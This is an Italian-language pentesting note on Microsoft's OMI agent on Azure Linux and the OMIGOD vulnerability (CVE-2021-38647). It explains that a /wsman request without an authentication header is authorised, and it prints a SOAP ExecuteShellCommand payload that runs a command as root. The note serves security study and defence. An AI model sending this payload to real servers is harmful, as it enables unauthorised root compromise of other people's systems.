Informazioni di base

OMI viene presentato come uno strumento open-source da Microsoft, progettato per la gestione della configurazione remota. È particolarmente rilevante per i server Linux su Azure che utilizzano servizi come:

• Azure Automation

• Azure Automatic Update

• Azure Operations Management Suite

• Azure Log Analytics

• Azure Configuration Management

• Azure Diagnostics

Il processo omiengine viene avviato e ascolta su tutte le interfacce come root quando questi servizi vengono attivati.

Le porte predefinite utilizzate sono 5985 (http) e 5986 (https).

Vulnerabilità CVE-2021-38647

Come osservato il 16 settembre, i server Linux implementati in Azure con i servizi menzionati sono suscettibili a causa di una versione vulnerabile di OMI. Questa vulnerabilità risiede nella gestione dei messaggi del server OMI tramite l'endpoint /wsman senza richiedere un'intestazione di autenticazione, autorizzando erroneamente il client.

Un attaccante può sfruttare ciò inviando un payload SOAP "ExecuteShellCommand" senza un'intestazione di autenticazione, costringendo il server ad eseguire comandi con privilegi di root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Per ulteriori informazioni su questa CVE controlla qui.

Riferimenti

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/